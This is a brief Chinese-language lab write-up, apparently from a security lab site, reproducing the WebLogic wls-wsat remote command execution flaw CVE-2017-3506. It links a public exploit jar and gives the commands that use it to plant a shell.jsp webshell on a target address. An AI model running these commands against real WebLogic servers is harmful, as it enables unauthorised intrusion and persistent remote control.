【初级】weblogic wls-wsat组件远程命令执行

CVE-2017-3506
漏洞描述:wls-wsat组件远程命令执行
影响范围
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0
EXP:https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2017-3506_webshell.jar

复现

  • java -jar cve-2017-3506_webshell.jar
图片[1]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室
  • java -jar cve-2017-3506_webshell.jar -u http://123.58.224.8:52925/
图片[2]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室
  • java -jar cve-2017-3506_webshell.jar -s http://123.58.224.8:52925 /wls-wsat/CoordinatorPortType11 shell.jsp
图片[3]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室
图片[4]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    请登录后查看评论内容